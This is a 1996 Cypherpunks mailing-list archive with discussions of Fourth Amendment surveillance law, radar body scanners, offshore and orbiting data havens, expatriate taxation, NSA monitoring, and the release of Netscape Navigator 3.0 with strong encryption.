down in e.g., Katz v. U.S., 389 U.S. 347 (1967) ("What a person knowingly
exposes to the public, even in his own home or office, is not a subject of
Fourth Amendment protection.... But what he seeks to preserve as private,
even in an area accessible to the public, may be constitutionally
protected."); California v. Greenwood, 486 U.S. 35 (1988); Smith v.
Maryland, 442 U.S. 735 (1979) ("A person has no legitimate expectation of
privacy in information he voluntarily turns over to third parties.") and
Florida v. Riley, 488 U.S. 445 (1989) (Involving the warrantless "search"
of a greenhouse from a helocopter 400 feet above).

All the "but it's modulated" arguments in the world mean nothing.

I understand your position, unfortunately the Supreme Court simply does
not agree with you.

> > > States such as N. Carolina (per extension via the 14th) should be 
> > > prohibited from regulating or otherwise controlling possesion and use
> > > of radar detectors (in this case) which are currently illegal for
> > > private persons to operate.
> > 
> > There is the additional matter of the obstruction of justice issues..
> 
> Obstruction of what justice? The goal is to keep the speed down so people
> are not killed. It is NOT to give the police a means to gather operating
> funds. If the police were honest in this pursuit they would sit on the side
> of the road radaring to their hearts content as long as their lights were on
> indicating they were actively on duty while everyone else zoomed along
> listening to their detectors buzz. Yes, we would have much less money from
> tickets but we would have many more living people paying taxes as well. I
> also suspect that if this were implimented it would take many fewer police
> to regulate traffic further reducing the needs for money. The law was
> specificaly and openly put in place because the radar detector decreased the
> chances of the police from catching and ticketing you, somewhat different
> than enforcing public safety.

Exactly, so the law prevented anyone who felt like it from breaking the
law with impunity because of a little box.  That's obstruction of justice.
"Well sure I slow down when I see a police officer, so I'm obeying the
law."

You also have to be carefuly about arguing for or against the legitimacy
of the law intermixed with arguments about the legitimacy of enforcement.

> The police in a democratic society should never be allowed to skulk around
> monitoring the populace.

Well, this position is highly subjective and so broad as to be a bit
suspect.  What about beat cops?  I could read the above to prohibit them.

Sit around and wait until called, is that your position?

I'm not saying it's reasonable or unreasonable, just a bit extreme.

> Cops hiding in the bushes and other such tactics are not law enforcement but
> rather state sanctioned theft. Gives 'highwayman' a whole new slant.

Again, this is subjective.  I don't much like speed enforcement either,
but one could as easly say "cops staking out a suspected site of a robbery
and hiding in vans or other such tactics are not law enforcement."

> The argument that by allowing such activity the police are prohibited from
> catching criminals ignores the fact that the police are firstly enforced
> with public safety. Their primary job is to PREVENT the incident within
> their operating parameters and only secondarily to apprehend participants
> after the fact.

Well, I think this ignores their anticipated deterrant effect, which goes
directly to public safety, but this is going way afield.

> Again, a strawman the courts and lots of others have swallowed.
> 
> > >I< tend to agree with you, but I see the arguments on the other side as
> > well.
> 
> I also see the other side, I believe the Constitutional approach that I
> advocate can meet and defeat any argument they may present PROVIDED the
> court does not have a alterior motive of sustaining the status quo but
> rather an open goal of enforcing the Constitution for life, liberty, and the
> pursuit of happiness.

Well, I tend to side with you, believe it or not, but your position is a
bit idealistic.  One must also approach the practical needs of law and
order.

> I believe that is a rare find indeed. Don't get me wrong. I estimate the
> chance of my success to win support, let alone actualy getting any of it
> implimented, as pretty close to nil. But if I don't discuss it on public
> forums such as this then who else will?

Point taken.

> > > If the police don't need a warrant to
> > > collect information then citizens are equaly able to recieve that
> > > information as well.
> > 
> > How EXACTLY does this follow?
> 
> Because courts, not police are empowered to search. Constitutionaly a police
> officer may detain you (by local law) but he may NOT search you until presented
> to a magistrate. This is what was meant by 'fair and speedy trial'. 

The above is incorrect.  There are MANY instances where police are
empowered to affect warrentless searches.

> > > Since the above ruling states that as long as the
> > > emissions are eminating from the site and the reception takes place
> > > other than at the site (in this case, being inside the police car)
> > > , perhaps along a public highway, then no privacy is involved. This
> > > means that citizens have a right, by extension, to know when they are
> > > being beamed by radar.
> > 
> > Again, you need to distinguish law enforcement purposes and private
> > purposes.
> 
> Constitutionaly there is no distinction. Police are citizens also.

State action and private action, a very serious and bright line
distinction exists.

> > > This same chain of logic can be extended to cell phones and such as
> > > well.
> > 
> > And yet you need a warrant to intercept cell phone conversation.
> 
> Exactly, and by extension you should need a warrant to monitor ANY other
> form of EM radiation when acting as a officer of the court collecting
> information or evidence relating to possible or existing proceedings.

Your argument amounts to the existance of bright line constitutionally
protected "areas."  This argument is an interesting one but it poses many
many practical problems and has been explicitly rejected by the Supreme
Court.

> > > This connection is even clearer when one realizes that the only difference
> > > between IR and your cell phone eminations is frequency. The intermediate
> > > vector boson in both cases is a photon.
> > 
> > And the fact that cellphones carry voice communications.
> 
> Is irrelevant. You can't know that fact without first measuring the medium.
> Sorta defeats the whole purpose. You have to measure it to determine if you
> can measure it, stupid or premeditated misrepresentation.

You must remember, the only sanction for violating the rule is exclusion.
Police can monitor it all they like, they just can present it as evidence.
So, if they were to monitor it and discover that it contained no
modulation, what's the harm?  If they discover modulation, they go for a
warrant.

> > > It is similar to arresting somebody for wearing a blue shirt but letting
> > > the person wearing the red shirt go free.
> > 
> > ANd having the blue shirt say "kill the president" maybe would even out
> > your example.
> 
> How? It certainly raises the spectre of 'strawman'. Attempting to change the
> subject to 'freedom of speech' is not a respectable tactic. What is on the
> shirt is irrelevant.

No, it was pointing out the difference between a communication and a blank
shirt.  What is on the shirt may be irrelevant, but the fact that it says
something is not.

>                                                   Jim Choate

In any event, I propose we move this to private mail.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Messick <eric@syzygy.com>
Date: Sun, 18 Aug 1996 09:08:56 +0800
To: cypherpunks@toad.com
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <199608150454.VAA12982@toad.com>
Message-ID: <199608172309.QAA10539@syzygy.com>
MIME-Version: 1.0
Content-Type: text/plain


I just happen to have the following article sitting on the desk next
to me:

San Jose Mercury News, Saturday, May 6, 1995, page 7A

Radar gives strip search a new meaning

New York Times

Engineers at a federally financed laboratory are developing a security
device that uses radar to peer through clothing to inspect for hidden
objects.

Working prototypes of these holographic radar scanners already exist,
and engineers at the Pacific Northwest Laboratory in Richland, Wash.,
believe a perceived need by security officials to scan for concealed
weapons and explosives may eclipse issues of cost.

The laboratory [...] has built two versions of its radar skin scanner,
one a walk-in booth that can scan an entire body and the other a
handheld device resembling a camcorder that can be pointed at specific
parts of a body.

The ultra-wind-band radar technology used in these inventions depends
partly on powerful computers, which analyze radar echoes reflected by
a subject's skin to construct visual images of the person's body in a
matter of seconds.

[...]

Representatives of the laboratory acknowledge that the sense of
modesty of some airline passengers, jurors, federal office workers and
others subjected to radar scanning might be offended.

"But the images, although explicit, are not pornographic," [Thomas]
Hall said.  "In any case, we foresee setting up the scanners in pairs
at each entry point - one for males and one for females, with security
officials matched by sex."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sun, 18 Aug 1996 06:21:45 +0800
To: cypherpunks@toad.com
Subject: Anguilla
Message-ID: <Pine.LNX.3.91.960817154651.21014E-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



First I think Tim's summary of my situation is very accurate and fair at 
this point.

One nit of a detail:
>I surmise, given the size of Anguilla and the non-constitutional basis of
>its government, etc., that it _might_ be a lot easier for a bureaucrat or
>the Governor-General, or whomever, to seriously disrupt any business by a
>few phone calls. I don't know this for a fact, but I suspect it to be
>true. 

Anguilla does have a constitution.  It would be hard for any bureaucrat to
seriously disrupt an Anguillian's business.  There just are not any
regulations that they can arbitrarily invoke to harras people.  However,
x-pats are here as guests and they have to get a work permit, or visa, or
something from time to time.  So if x-pats do something that wears out
their welcome, they have to leave. 

Tim:
>Contrast this with a small data haven (a new
>industry) in a small country, with operating margins that are razor-thin
>(given the pricing structure Vince announced, I doubt Taxbomber and other
>customers were paying enough to ensure a flow of payoffs to the Ruling
>Families of Anguilla and the various officials that need to look the other
>way).

Nope, no bribes to government.  However, in doing business here a lot of
people have learned more about the Internet and computers.  And I and
another x-pat have started a weekly computer club.  So there are good
reasons that Anguilla should like having me here. 

For the record, the only bribe I have paid while I was here was
(indirectly) to someone at the phone company to try to get a phone
installed faster.  It did not help, still took a year to get the phone. 
Cable and Wireless, and their high prices, is the worst thing about
Anguilla. 

The current Anguilla government seems to be very clean.

The rumor is that Cable and Wireless bribed the previous government with
things like a free loan of a bulldozer worth $500/day for a couple weeks
to get their 30 year monopoly contract.  Given that CandW is making
millions each year, seems they got off cheap, if true.  Claim is that the
UK does not mind their companies bribing officials, and CandW does it alot
all around the world. 

  --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Sun, 18 Aug 1996 05:18:24 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: "world communications being monitored"
In-Reply-To: <199608170344.UAA05092@netcom22.netcom.com>
Message-ID: <Pine.3.89.9608171644.A13951-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 16 Aug 1996, Vladimir Z. Nuri wrote:
> I heard an amazing news report on the radio today, that confirmed
> what I've heard and suspected for a long time - all international
> communications *are* continually being monitored!!

Yes, this has been public record information for at least 15 years.

> program - a system of monitoring stations have been set up in various
> countries in the world that continually monitor ALL fax, email,
> telephone and satellite communications etc, "sniffing" for keywords
> using super computers. When these key words are identified the
> information is automatically logged and according to Hager, sent
> directly to the US intelligence services.

Which is located in Ft. Meade, etc etc.  Yes, we know.  That's why the 
big interest on this list for military grade encryption for ensuring the 
privacy of personal communications.  It's also why there's such a big 
push by governments for key escrow technology.  Governments want to keep 
this "edge", the existence of which hasn't yet penetrated popular awareness.

For more information on the subject, search some magazine indices or 
archives of this list for the keywords NSA or National Security Agency.
A surprising amount of information, including all of what you've mentioned, 
and more, is readily available in the public record.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 18 Aug 1996 07:00:34 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Ad Hoc Bay Area Cypherpunks Thing--Sat., 24 Aug, 3 pm, Menlo Park
In-Reply-To: <ae3b79331402100447b0@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960817171545.2500G-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996, Timothy C. May wrote:

> There is no Cypherpunks event scheduled for that Saturday, but we can have
> an ad hoc gathering, informally arranged. I suggest meeting at 3 p.m. at
> Cody's Bookstore, on El Camino Real in Menlo Park (hard to miss). Or at the
> coffee shop next to it...either should be sufficient Schelling points to

Do you mean Kepler's? That's the one right near Menlo Park caltrain 
station; the coffee shop next to it is  Cafe Borone. Get the Mocha.

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DAVID A MOLNAR <molnard1@nevada.edu>
Date: Sun, 18 Aug 1996 10:20:11 +0800
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: US Taxes on X-Pats
In-Reply-To: <Pine.LNX.3.91.960817152107.21014B-100000@offshore>
Message-ID: <Pine.OSF.3.91.960817172848.6275A-100000@pioneer.nevada.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 17 Aug 1996, Vincent Cate wrote:

> 
> Robert Hettinga <rah@shipwright.com>
> > However, as Black Unicorn has noted here before, the Phillipenes are the
> >only other country besides the USofA where citizens are taxed any income
> >you get, no matter where on earth you actually earn it.
> 
> It is not exactly that bad if you are outside the USA. I got ahold of the
> IRS codes on this before I left the USA (so about 2 years ago).  The rule
> then was that the first $70,000 you earned was tax free if you were
> outside the USA for 330 days or more of the year.  From another x-pat in
> Anguilla I heard that the $70 K had been increased. 
	Is this so? Last I had heard, Congress was looking at eliminating 
the credit altogether. It's slightly misleading to call it "tax free", 
though; the way I understand it, it's not included in the IRS's 
estimation of your assets, but may play a factor in determining the final 
amount of $$$ you end up paying. Very rarely does it translate directly 
into a $70,000 break on your taxes, although it does help. At least 
that's the way it has been represented to me (albeit by an expatriate 
chapter of the American Businessmen's Association). There are no doubt 
rules and exceptions to what manner of income may be exempted, as well. 
	It would be wonderful if the amount were increased. It would be 
preferable if the requirement to pay taxes at all were eliminated, but 
that would be asking too much of today's deficit-hungry, anti-"corporate 
welfare" environment...
Not that it affects me anymore one way or the other, except insofar as it 
hinders the desireability of U.S. workers abroad. One wonders that 
whether the spread of such potential tax-avoidance schemes as 
ecash/data-havens may, er, restore U.S. competitiveness in a novel way. 
:-) 

-David Molnar
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sun, 18 Aug 1996 07:45:04 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla - A DataHaven?
In-Reply-To: <4v12d9$ncp@life.ai.mit.edu>
Message-ID: <32163DED.167E@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


The problem with the debatre on datahavens is that it is
failing to account fo the fact that without the infrastructure
of law business is not possible.

What taxbomber offers is false identification papers. He does
not simply offer fake passports but a whole raft of fake
credentials. If I am offering free services to accredited 
journalists and someone comes along with a taxbomber supplied
illegitimate press card and obtains free services that is fraud.

Just because a policy for supplying credentials is not fully
effective does not make it legitimate for an individual to 
make a business out of helping people to criminally exploit its
flaws.


Similarly libertarian wet dreams about oil rigs chock full of
commandos armed to the teeth with machine guns will remain dreams.
Fact is that under international law an oil rig is regarded 
as a ship and as such has to be acredited by some recognised
nation. Diplomatic recoginition is not a trivial matter.
Countries only provide recoginition if it is in their interests
and critically it is _governments_ that are recognised.

A declaration of independence by the inhabitants of an oil rig
would be treated in a similar fashion to the Montana freemen.
If the intention was to make international fraud easier then
definitely expect the same treatment.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sun, 18 Aug 1996 11:13:07 +0800
To: cypherpunks@toad.com
Subject: Re: Orbiting Datahavens
Message-ID: <199608180102.SAA20983@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About 17 Aug 96, 5:24, Brian C. Lane wrote:
> 
>   How about an orbiting DataHaven. No jurisdiction to bother with,
> extremely difficult to get to (except by large governments...).

<SNIP>

> it would work. Might even be cheaper than outfitting the oil-rig
> with the rate that they are tossing satellites into space.
> 
>   If the HAM radio community can get a satellite into space, why not
>   the
> Cypherpunks/Linux communities?


This is a fascinating concept that needs to be further researched.  
It would be interesting to do some cost examinations.  I have always 
been behind any private space programs!  I am even behind the Govt. 
Programs.

Ross Wright
King Media:  Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Sun, 18 Aug 1996 07:51:38 +0800
To: cypherpunks@toad.com
Subject: Re: Greetings from Whore.com
Message-ID: <199608172210.SAA18778@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, it was getting a bit "stiff" in here.... but I guess 'ya never can 
tell.. I haven't checked it out.. has anybody ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sun, 18 Aug 1996 10:47:51 +0800
To: CP <cypherpunks@toad.com>
Subject: Re: Orbiting Datahavens
Message-ID: <199608180107.SAA21086@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On Or About  2 Jul 96, 17:06, Brian Lane wrote:

> to have a backup satellite in case of a disaster. Once the Delta
> Clipper is functional

They did have that big wreck a couple of weeks ago.  I am not sure of 
the salvage status.

Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Sat, 17 Aug 1996 23:31:42 +0800
To: "James A. Donald" <cypherpunks@toad.com>
Subject: Software manpower exports and the power of governments
Message-ID: <1.5.4.32.19960817121723.002f9b34@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 13:23 16/08/96 -0700, James A. Donald wrote:
>At 10:49 PM 8/14/96 +0600, Arun Mehta wrote:
>> I was trying to explain how incomes and prices happened to be
>> lower in India, 
>
>That was not an explanation, that was mystic word salad.  
>
>It would be an explanation if wealth mysteriously rained
>from the sky, rather than was produced by men.

Huh? And why are we so grumpy today?

>In fact what gets sent to the Indian campus is largely legacy
>work, which is in large part precisely the work that requires 
>the closest contact with the customer, contact with actual 
>working conditions, and the like.

Not necessarily: as an example of legacy work, consider the
conversion of Cobol to 4GL. When you have a working program to
emulate, you can do that without too much customer contact. It's
in new software (where maybe the customer is herself not clear
what she actually needs) that close contact is essential. 

Take another example: you have some old software, and you need to
add a bell or whistle. Sure, you may need to run the modified
software on site for testing, but often that too can be done from
a remote terminal. And even if you do have to travel for the
purpose, it still works out cheaper, since manpower costs are low
in the 3rd world.

>This seems to be a general practice, not just an Informix practice, for
>in an article on "India's silicon valley" I read that the work done in
>India was largely done on existing legacy apps, often in obsolete
>languages and operating systems.

Um, maybe you misread: why would an American company pay to have
software written, that only runs on obsolete machines? Now,
converting that software to run on a modern machine, that's
altogether different -- you have to be able to read Cobol or
Autocoder or whatever, but what you actually write would be based
on modern tools. 

>This is of course the work that places the least amount of the
>companies intellectual assets in India, and thus the work that
>gives the Indian government the least power over Informix and its
>activities.  Informix could abandon the Indian campus and all
>the intellectual assets on which it was working, and all the
>physical assets located there, at any moment and not suffer any 
>serious loss or inconvenience.

A sensible business decision: long-distance security is hard to
achieve. But I doubt that it has anything to do with the power
that the Indian government has (or hasn't) over Informix?

>It is overwhelmingly clear that the question is simply who has the 
>power?  Those who wish to hire peoples services in order to produce
>wealth, or those who can command peoples services because they have
>guns?

Are you suggesting that Indian programmers come to work with like
a chain gang, with armed government guard? You really must talk
to some programmers from India, ask them if the government
commands them this way, but do have some oxygen handy, or they
might die laughing...

>That is what makes most people in some places poor and most people 
>in some places affluent.

Look, governments in the 3rd world are often stupid and corrupt
-- no doubt that contributes to poverty, but that isn't the only
reason. I'm sure one of the reasons is cultural: modern
industrial societies require a high degree of training,
discipline, whatever. Western societies needed centuries of
misery to learn these, we're trying to do it faster, and
hopefully be a bit more humane in the process.

>> Could you please be more precise? In what way does the "power of
>> the Indian government" intrude? 

>Presumably the same kind of reasons as caused foreign companies
>to flee India the first time around.

Other that Coke and IBM, which we already discussed, can you name
one other? In the last years, lots of companies have opened shop
here, including Coke and IBM.

And even these two didn't flee: a new law was passed, they didn't
want to comply, so they left or were asked to leave. In the case
of Coke, I can understand the government not wanting to spend
precious foreign exchange on sugared water in a country where
there is a serious shortage of drinking water. Tim made the
perfectly valid point that such decisions cost the country in
reputation, but the Indian government doesn't mind loss of
reputation in matters it firmly believes in, as in the current CTBT discussion.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 18 Aug 1996 10:09:38 +0800
To: "Brian C. Lane" <blane@aa.net>
Subject: Re: Orbiting Datahavens
In-Reply-To: <32155657.53661@mail.aa.net>
Message-ID: <Pine.LNX.3.93.960817183047.2135A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996, Brian C. Lane wrote:
>   With all the recent talk about converted oil-rig DataHavens floating
> around the oceans, fending off pirates, and Low-Orbit satellite
> communications, I had a thought.
>   How about an orbiting DataHaven. No jurisdiction to bother with,
> extremely difficult to get to (except by large governments...). You could
> put together a couple of Linux boxes with a RAID system, some backups and a
> large solar panel and have a very nice, secure DataHaven.
>   Granted, you wouldn't have all the fun of floating around the south
> pacific fending off pirates and navies who are after your data, but it
> would work. Might even be cheaper than outfitting the oil-ring with the
> rate that they are tossing satellites into space.
>   If the HAM radio community can get a satellite into space, why not the
> Cypherpunks/Linux communities?

     It is just as easy to take out a satelite in LOE as it is to sink an
oil rig, plus swapping defective Hard Drives is a real bitch.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sun, 18 Aug 1996 10:09:24 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Software manpower exports and the power of governments
In-Reply-To: <1.5.4.32.19960817121723.002f9b34@giasdl01.vsnl.net.in>
Message-ID: <Pine.LNX.3.93.960817183611.2135B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996, Arun Mehta wrote:

> Look, governments in the 3rd world are often stupid and corrupt
                           ^^^
     Looks like a little line noise crept in. I don't think that 
was supposed to be there...


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 18 Aug 1996 08:28:25 +0800
To: szabo@netcom.com
Subject: Re: Credit enforcement
In-Reply-To: <199608162123.OAA16545@netcom.netcom.com>
Message-ID: <Pine.SV4.3.91.960817184151.21584C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I thought that classical libertarians agree that the enforcement of 
contracts is a proper function of the government.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Sun, 18 Aug 1996 11:23:28 +0800
To: cypherpunks@toad.com
Subject: anonymizer and cookies
Message-ID: <2.2.32.19960818014330.0099b85c@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


is there anything definite about the Anonymizer and cookies? according to
the DEC browser tester at

http://www.research.digital.com/nsl/formtest/stats-by-test/NetscapeCookie.html


shows some successful cookies passing through www.anonymizer.com and some
bad cookies. What's the final word?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sun, 18 Aug 1996 08:35:05 +0800
To: cypherpunks@toad.com
Subject: Re: Schlafly on crypto
In-Reply-To: <4uu76c$ahk@life.ai.mit.edu>
Message-ID: <32164B5A.2781@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


If we are having a Schlafy bash then i think it fair to bring up
her "Con-Con" paranoia. She has published a series of articles 
predicting that there will be a "Constitutional Convention" -
that is not one of your ordinary constitutional ammendment sessions
but a wholesale rewritting of the US constitution by a cabal as 
happened when it was first written.

A typical rant:-

>They adopted a plan to plunge America into a Constitutional
>Convention. Article V of the U.S. Constitution requires that "on the
>Application of the Legislatures of two thirds of the several States,
>[Congress] shall call a Convention for proposing Amendments." This
>method has never been used; all 27 Amendments now in the Constitution
>were adopted in the traditional way (passage by a two-thirds majority in
>each House of Congress followed by ratification by three-fourths of the
>states). 
http://www.eagleforum.org/users/eagle/public_html/psr/1996/may96/psrmay96.html

In fact despite Schlafy having predicted such a conference many times
over the past years (I have seen more than 10) her claims are entirely
false, not to say fraudulent. She uses the usual tricks of citing
fraudulent references and making up quotes. In short she is a fraud
hoping to get people to join her foundation to stop a Con con that
nobody is proposing.

I don't think that Schlafy is a usefull aly any more than Bob Dole
basically its just opportunist politicians latching onto the rhetoric
of debates without engaging in the argument. Dole senses that the mood
of the country is pro crypto so he supports that, he senses that it
is anti porn so he will support that.

Basically Schlafy is playing the same game. She is saying things that
she knows will curry favour so she can get people to join her Wacko
club. 


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Sun, 18 Aug 1996 04:00:08 +0800
To: CP <cypherpunks@toad.com>
Subject: Re: Orbiting Datahavens
In-Reply-To: <32155657.53661@mail.aa.net>
Message-ID: <9608171851.aa04986@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <32155657.53661@mail.aa.net>, "Brian C. Lane" writes:
>  How about an orbiting DataHaven. No jurisdiction to bother with,
>extremely difficult to get to (except by large governments...). You could
>put together a couple of Linux boxes with a RAID system, some backups and a
>large solar panel and have a very nice, secure DataHaven.

	Wouldn't you have to use military-grade chips for the hardware? (Or
whatever the type is - it had better survive launch, not to mention solar
flares.)

>  Granted, you wouldn't have all the fun of floating around the south
>pacific fending off pirates and navies who are after your data, but it
>would work. Might even be cheaper than outfitting the oil-ring with the
>rate that they are tossing satellites into space.

	Well, there would be less need to make it hurricane proof! :-)

>  If the HAM radio community can get a satellite into space, why not the
>Cypherpunks/Linux communities?

	Wow - I've been out of touch with space programmes in the last few
years - which satellite was this? (The HAM radio one?)

	Anyone have any reccomendations for good web sites on
satellites/rockets/space science in general?

	Here's a couple of ESA URLs to start the ball rolling:
ARIANE 5 Failure - Full Report
European Space Agency


	I'm not sure who would launch it - a Japanese launcher? (ESA is
strapped for cash, which was one reason for the phenomenaly stupid move of
putting space probes onto the maiden flight of the Ariane 5.)

	Derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 18 Aug 1996 11:50:23 +0800
To: cypherpunks@toad.com
Subject: Final release of Navigator (with strong crypto) now available
Message-ID: <321677C2.663B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


The final release of Navigator 3.0, complete with non-exportable
strong crypto, is now available for download by US citizens.  Note
that this is the released version of 3.0, so it will not expire.
You can get it from:

	http://wwwus.netscape.com/eng/US-Current/

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 18 Aug 1996 08:58:57 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible searches
In-Reply-To: <ae3a68680e0210043016@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960817185314.21584F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


YOu are correct that a gun cannot be imaged behind an actual screen.

I am correct that a peice of tinfoil doesn't comprise an actual screen.

Go price a shield room, and see how much is for materials, and how much 
is for labor.  Go talk to the crew that's putting it in; you'll see that 
they travel all the hell over the world putting these things in, because 
the vendor can't just hire some pick-up electricians and dry-wall types.

If the source radiates its EM waves, which reach and intercept the 
tinfoil, unless the tinfoil is correctly bonded, shielded, grounded, etc, 
the tinfile will re-radiate. That can be imaged.

I do this class of imaging, from signals that are weaker than these, for a
living. In fact, we sometimes have to apply attenuation at the front end
to stop overload of the amplifiers and signal processors.  No, I'm not 
going to talk about it. Not because I'm a hot-shit keeper of classified 
information, rather because I'm lazy, or maybe because I'm accustomed 
to getting paid for teaching? Most of the concepts are discussed in IEEE 
journals and other sources.  You could hand all the open sources, and a 
few billion dollars, to the Botswanians tomorrow; it would still take 
them a dozen years to get it working reliably. It's as much art as 
science. I guess the fancy word is "engineering".

You don't know how to do it; so what. I know how to troublehoot and 
repair it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Sun, 18 Aug 1996 12:33:59 +0800
To: cypherpunks@toad.com
Subject: Re: Final release of Navigator (with strong crypto) now available
Message-ID: <199608180226.TAA07994@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: jsw@netscape.com, cypherpunks@toad.com, tomw@netscape.com
Date: Sat Aug 17 21:26:37 1996
Thanks for the info.  Downloading now and it appears to be going more 
smoothly than the time I got beta 6.  No delays and good throughput.  And I 
have yet to talk with someone that has successfully downloaded the `other 
guys` 128-bit version.  I sure have not been able to!

Thanks,

Lou Zirko

> The final release of Navigator 3.0, complete with non-exportable
> strong crypto, is now available for download by US citizens.  Note
> that this is the released version of 3.0, so it will not expire.
> You can get it from:
> 
>       http://wwwus.netscape.com/eng/US-Current/
> 
>       --Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 
> 



Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMhZ/dstPRTNbb5z9AQEIggf/d0Q53oNSB3gM2Kk0XMsZhQVVd1gqYfoS
sK1Ja5Qy6wqpzX452oEO21qetQsjs6yW19T3PdLqfr+YZW0zTbOcsbmUoNnzs8xF
+2hfKdtRiMeZRo1HpKZ1kx3SUGR9SCLymVV0mWecOpwpdnj8i69K8Xv3eEEhbX4S
aQJakxjr/qmjOtW5k5iuU93eosdhXjsHCkICY75YzuwX/VtkN3tMU28jsuYXGokf
LjxuXBoTi/1+U80iSlCLYwXFrwoeZ+FTc2NACRPDJnAnLX4GbatLlLbP92918Xvt
SeiVEeia46WQqRbJRHMnlif2z3gn1Fit0qdgn1U7f59aKUVgKQu95Q==
=LIdQ
-----END PGP SIGNATURE-----





